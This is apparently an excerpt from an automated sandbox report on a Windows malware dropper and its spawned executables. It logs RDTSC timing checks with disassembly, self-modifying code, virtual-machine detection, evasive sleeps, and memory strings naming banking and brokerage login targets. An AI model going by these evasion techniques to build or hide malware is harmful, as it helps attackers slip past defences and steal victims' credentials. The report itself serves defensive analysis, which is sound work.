Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F029E5 second address: F02A48 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C5452242Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F8C54522450h 0x00000011 nop 0x00000012 push eax 0x00000013 mov esi, dword ptr [ebp+122D2B9Dh] 0x00000019 pop esi 0x0000001a cld 0x0000001b push 00000000h 0x0000001d jnl 00007F8C5452242Ch 0x00000023 add edx, dword ptr [ebp+122D39A5h] 0x00000029 push 12E09105h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02A48 second address: F02A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02A4C second address: F02ADE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C54522426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 xor dword ptr [esp], 12E09185h 0x00000018 jmp 00007F8C54522436h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F8C54522428h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 sub ecx, dword ptr [ebp+122D2121h] 0x0000003f sbb cx, EDDDh 0x00000044 push 00000000h 0x00000046 call 00007F8C5452242Dh 0x0000004b mov dword ptr [ebp+122D2184h], eax 0x00000051 pop edx 0x00000052 push 00000003h 0x00000054 mov dword ptr [ebp+122D2BAFh], eax 0x0000005a mov dword ptr [ebp+122D2519h], ecx 0x00000060 call 00007F8C54522429h 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 pushad 0x00000069 popad 0x0000006a push eax 0x0000006b pop eax 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02ADE second address: F02AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jc 00007F8C5451FBB8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02AFC second address: F02B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02B00 second address: F02B14 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C5451FBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02B14 second address: F02B3D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C5452242Eh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C54522430h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02B3D second address: F02B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBC2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02B53 second address: F02B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02C5F second address: F02C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02C65 second address: F02CC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522436h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D2D0Eh], ebx 0x00000014 push 00000000h 0x00000016 jmp 00007F8C54522433h 0x0000001b push 9E69CE19h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8C54522439h 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02CC1 second address: F02CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F213CE second address: F213D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F217C8 second address: F217EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F8C5451FBCCh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F21EA2 second address: F21EA8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F21EA8 second address: F21EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8C5451FBB6h 0x0000000a jc 00007F8C5451FBB6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F21EB8 second address: F21EF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5452242Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8C54522435h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F8C5452242Fh 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F21EF4 second address: F21F18 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C5451FBBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C5451FBC2h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F21F18 second address: F21F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F22186 second address: F2218F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F16262 second address: F16268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F16268 second address: F1626E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F1626E second address: F16289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F8C54522433h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F22AE2 second address: F22AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C5451FBC1h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F22AFD second address: F22B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007F8C5452242Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F8C54522436h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F22B31 second address: F22B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC6h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F22B50 second address: F22B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C54522426h 0x0000000a jmp 00007F8C5452242Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F8C54522426h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F22F91 second address: F22F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F22F95 second address: F22F9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F232A6 second address: F232E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jns 00007F8C5451FBB6h 0x0000000e jmp 00007F8C5451FBC4h 0x00000013 popad 0x00000014 jnp 00007F8C5451FBD3h 0x0000001a jmp 00007F8C5451FBC7h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F232E8 second address: F232F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 553D27 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6F4463 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7824FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Special instruction interceptor: First address: D7EA6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Special instruction interceptor: First address: D7EB3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Special instruction interceptor: First address: D7EAA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Special instruction interceptor: First address: FB45A2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9FEA6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9FEB3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9FEAA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C345A2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Special instruction interceptor: First address: 4DA0C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Special instruction interceptor: First address: 5025C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Special instruction interceptor: First address: C93D27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Special instruction interceptor: First address: E34463 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Special instruction interceptor: First address: EC24FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Special instruction interceptor: First address: 136A0C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Special instruction interceptor: First address: 13925C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Special instruction interceptor: First address: 11EA6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Special instruction interceptor: First address: 11EB3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Special instruction interceptor: First address: 11EAA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Special instruction interceptor: First address: 3545A2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Special instruction interceptor: First address: B7A0C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Special instruction interceptor: First address: BA25C4 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Memory allocated: 4EC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Memory allocated: 5100000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Memory allocated: 4F10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Memory allocated: 4AD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Memory allocated: 4D80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Memory allocated: 4AD0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Code function: 3_2_05620813 rdtsc 3_2_05620813
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Code function: 7_2_00DCFB37 sldt word ptr [edx] 7_2_00DCFB37
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 373 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 8031 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Window / User API: threadDelayed 768
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 1020 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe TID: 7488 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep count: 70 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep time: -140070s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep count: 73 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep time: -146073s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7668 Thread sleep count: 373 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7668 Thread sleep time: -11190000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7784 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep count: 333 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep time: -666333s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep count: 58 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep time: -116058s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep count: 8031 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep time: -16070031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe TID: 7872 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe TID: 7960 Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe TID: 7580 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe TID: 7552 Thread sleep time: -78000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe TID: 8040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe TID: 6208 Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe TID: 6208 Thread sleep time: -366000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe TID: 3204 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe TID: 2812 Thread sleep time: -30000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Thread delayed: delay time: 922337203685477
Source: skotes.exe, skotes.exe, 00000006.00000002.2370437458.0000000000B88000.00000040.00000001.01000000.00000009.sdmp, A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000000.2328464315.0000000000DD8000.00000080.00000001.01000000.0000000B.sdmp, A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000002.2471952944.0000000000DD8000.00000040.00000001.01000000.0000000B.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2826660274.0000000001348000.00000040.00000001.01000000.00000010.sdmp, 09d417a7c4.exe, 00000010.00000002.2933809518.0000000000E16000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 09d417a7c4.exe, 0000000B.00000003.2801877590.0000000005DCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, file.exe, 00000000.00000003.2184690433.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283943556.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184075512.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126652942.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184381596.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168617103.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2241071323.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184807186.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2167800399.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184520949.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: firefox.exe, 0000001B.00000002.3147820889.0000025579E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 353ab0ae6e.exe, 0000000C.00000002.2828087899.00000000016B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[0;J
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
